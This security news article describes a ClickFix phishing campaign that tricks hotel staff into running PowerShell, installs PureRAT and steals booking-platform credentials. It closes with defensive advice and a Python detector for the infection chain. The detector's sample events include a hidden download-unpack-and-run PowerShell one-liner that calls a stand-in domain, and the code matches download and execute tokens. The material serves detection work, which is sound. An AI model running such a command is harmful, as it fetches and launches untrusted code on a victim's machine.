Hotel Managers Targeted by ClickFix Phishing – PureRAT Used to Harvest Booking.com Credentials

Campaign overview
Security researchers have exposed an ongoing, large-scale phishing campaign against the hospitality sector that lures hotel staff to ClickFix-style pages impersonating major booking platforms (Booking.com, Expedia), deploys malware such as PureRAT (zgRAT) to steal extranet credentials, and then uses that access to defraud guests. The operation has been active since at least April 2025 and was still running in October 2025, according to Sekoia, which analyzed the latest wave. The attackers' goal is to obtain booking-platform admin credentials and payment/card details for resale or direct fraud.
Attack chain (high level)
The campaigns follow a consistent social-engineering + malware flow:
- Initial compromise / spoofing: Attackers use a compromised email account to send spear-phishing messages to hotel admins or hijack legitimate booking-related email threads.
- Redirection to ClickFix pages: Targets are directed via a URL chain to a fraudulent “ClickFix” verification page that looks like a reCAPTCHA or security check for Booking.com/Expedia.
- Clipboard & run social engineering: The bogus page often adapts to the victim’s OS, auto-copies a PowerShell command to the clipboard, and instructs the user to paste/run it (clipboard-hijacking + OS-specific prompts).
- Payload download & persistence: The pasted command downloads a ZIP containing an executable and a malicious DLL placed beside it; the executable side-loads the DLL, which loads PureRAT/zgRAT, and persistence is established through a Run registry key.
- Post-exploitation: The operators harvest credentials (extranet accounts, cookies), deploy infostealers, set up remote access, and use stolen credentials to access booking platforms or send fraudulent reservation/verification messages to guests.

PureRAT (zgRAT) & related malware — capabilities observed
Analysts note the malware family and associated toolset provide a robust spying and takeover capability:
- RAT features: remote shell, file upload/download, screen capture, webcam/mic control, keylogging, process enumeration, and command execution.
- Evasion / protection: samples observed protected with .NET Reactor to hinder reverse engineering.
- Persistence: a Run registry key that relaunches the side-loading host binary at logon, so the malicious DLL is reloaded without touching the registry entry itself.
- Credential theft & pivoting: operators deploy browser-stealer tools and loggers to extract session cookies, passwords, and admin credentials for Booking.com, Expedia, Airbnb and similar services.
- Guest-targeting: attackers also use phishing to collect guest payment details via fake reservation verification pages sent by WhatsApp/email.
Researchers also reported the use of infostealers and RMM-like tools in related clusters (NetSupport, DanaBot variants, Lumma Stealer, StealC), indicating mixed objectives: account resale and direct fraud.
Crime-as-a-service and the illicit economy behind the attacks
Sekoia and other analysts highlight how the attack chain is supported by an ecosystem:
- Account resale & log-checker services: Telegram bots and underground sellers offer Booking/Expedia logs and “checked” accounts for sale; services verify harvested credentials via proxies.
- Role specialization: operators outsource distribution to “traffers” (malware distributors) and buy booking logs from market operators who claim manual verification.
- Professionalization: turnkey services (log databases, checkers, malware builders) lower the barrier and scale these fraud operations across regions.
This commercialized model accelerates both the spread and sophistication of hospitality-targeted campaigns.
Business & guest impact
Consequences for hospitality organisations include:
- Unauthorized changes to bookings and reservation inventory leading to financial loss.
- Guest fraud / card theft from fake reservation verification pages.
- Reputational damage and loss of customer trust.
- Resale of valid extranet access or misuse to send follow-up phishing to guests.
- Regulatory exposure if payment data or personal information is exposed.
Anecdotal victim reporting indicates attackers have deleted booking emails, blocked notifications, and impersonated legitimate parties during recovery calls, demonstrating operational knowledge of booking workflows.
Defensive recommendations
To reduce risk and detect these campaigns, organisations should prioritize:
- Email & link protections: block or sandbox links to unknown landing pages; block .exe/.msi attachments and flag pages that auto-copy clipboard contents.
- Stop execution from the clipboard: educate staff never to paste and run commands copied from a website; for standard users, restrict interactive PowerShell and the Windows Run dialog (Win+R) through AppLocker/WDAC or Group Policy where operations allow. Note that the PowerShell execution policy alone is not a security boundary; ClickFix commands run as one-liners and bypass it.
- Restrict RMM/remote tools: allow only pre-approved remote-support tools and use application allowlisting and EDR to block unauthorized installers.
- Harden booking extranet accounts: enforce strong, unique passwords, enforce MFA on Booking/Expedia extranet accounts, and monitor for anomalous logins (geographic anomalies, rapid session use).
- Credential monitoring & rotation: treat exposed accounts as high-risk; rotate credentials promptly and audit sessions on compromise suspicion.
- Endpoint detection: tune EDR to flag PowerShell spawned by explorer.exe (the Run dialog) that downloads or expands archives, executables launched from user-writable directories such as %TEMP% or Downloads, unsigned DLLs loaded from the same directory as their host process (side-loading), and new Run-key values pointing at those paths.
- Guest protection: avoid asking customers to enter card details via emailed links; use secure payment flows and crisis-response templates for communications.
- Threat intel & sharing: share IOC feeds with sector peers and ISACs; monitor underground markets for leaked extranet accounts tied to your properties.
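The attack chain and the endpoint-detection advice above map onto four observable stages. The Python below, as an added example that is not code from Sekoia's or The Hacker News' reporting, encodes those stages as rules over Sysmon-style process-creation (Event ID 1), image-load (Event ID 7) and registry (Event ID 13) events and scores how much of the chain was seen on a host. The events are constructed for illustration; field names follow Sysmon's schema, but the host name, the file names (check.zip, host.exe, helper.dll), the registry value name and the domain verify.example.invalid are invented.

```python
"""ClickFix -> drop -> DLL side-load -> Run-key chain detector over Sysmon-style events.
Added example; the sample events below are constructed, not real telemetry."""
import re

SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")
# Directories a standard user can write to (assumed list, extend for your estate).
USER_WRITABLE = re.compile(r"\\(AppData\\Local\\Temp|Downloads|Users\\Public)\\", re.IGNORECASE)
# Download / unpack / hide-window tokens typical of pasted ClickFix one-liners.
DOWNLOAD_OR_UNPACK = re.compile(
    r"(invoke-webrequest|\biwr\b|downloadfile|downloadstring|\bcurl\b|expand-archive|"
    r"-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b|\biex\b|invoke-expression)",
    re.IGNORECASE,
)

def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def _dirname(path):
    return path.rsplit("\\", 1)[0].lower()

def clickfix_launcher(ev):
    """Stage 1: a shell spawned by explorer.exe (Win+R) that downloads or unpacks something."""
    return (ev["EventID"] == 1 and _basename(ev["Image"]) in SHELLS
            and _basename(ev["ParentImage"]) == "explorer.exe"
            and DOWNLOAD_OR_UNPACK.search(ev.get("CommandLine", "")) is not None)

def user_writable_exec(ev):
    """Stage 2: a shell starts an executable out of a user-writable directory."""
    return (ev["EventID"] == 1 and _basename(ev["ParentImage"]) in SHELLS
            and USER_WRITABLE.search(ev["Image"]) is not None)

def sideload_from_user_dir(ev):
    """Stage 3: an unsigned DLL loaded from the same user-writable directory as its host EXE."""
    return (ev["EventID"] == 7 and USER_WRITABLE.search(ev["ImageLoaded"]) is not None
            and _dirname(ev["ImageLoaded"]) == _dirname(ev["Image"])
            and str(ev.get("Signed", "false")).lower() == "false")

def run_key_persistence(ev):
    """Stage 4: a Run key value written that points at a user-writable path."""
    return (ev["EventID"] == 13
            and re.search(r"\\currentversion\\run\\", ev["TargetObject"], re.IGNORECASE) is not None
            and USER_WRITABLE.search(ev.get("Details", "")) is not None)

RULES = {
    "clickfix_launcher": clickfix_launcher,
    "user_writable_exec": user_writable_exec,
    "sideload_from_user_dir": sideload_from_user_dir,
    "run_key_persistence": run_key_persistence,
}

def detect(events):
    """Return (rule_name, image) for every rule that fires, in event order."""
    return [(name, ev["Image"]) for ev in events for name, rule in RULES.items() if rule(ev)]

def chain_severity(hits):
    """Three or more distinct stages on one host is treated as a confirmed chain."""
    stages = {name for name, _ in hits}
    return "high" if len(stages) >= 3 else ("medium" if stages else "none")

# Constructed sample telemetry for one workstation (not real events).
EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell -w hidden -c "iwr https://verify.example.invalid/check.zip -OutFile $env:TEMP\check.zip; Expand-Archive $env:TEMP\check.zip $env:TEMP\check; Start-Process $env:TEMP\check\host.exe"'},
    {"EventID": 1, "Image": r"C:\Users\frontdesk\AppData\Local\Temp\check\host.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"C:\Users\frontdesk\AppData\Local\Temp\check\host.exe"},
    {"EventID": 7, "Image": r"C:\Users\frontdesk\AppData\Local\Temp\check\host.exe",
     "ImageLoaded": r"C:\Users\frontdesk\AppData\Local\Temp\check\helper.dll", "Signed": "false"},
    {"EventID": 13, "Image": r"C:\Users\frontdesk\AppData\Local\Temp\check\host.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\CheckUpdater",
     "Details": r"C:\Users\frontdesk\AppData\Local\Temp\check\host.exe"},
    # Benign scheduled script: service host launches PowerShell with a fixed script path.
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell -File C:\Scripts\nightly-backup.ps1"},
]

if __name__ == "__main__":
    hits = detect(EVENTS)
    for name, image in hits:
        print(f"{name:24s} {image}")
    print("severity:", chain_severity(hits))
```

The rules deliberately key on relationships (parent process, directory of the loaded DLL versus its host, Run value target) rather than on file names or domains, since those rotate between waves; the severity function rewards seeing several stages on the same host, which is what separates a ClickFix infection from an isolated noisy PowerShell invocation.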
Source: thehackernews.com, blog.sekoia.io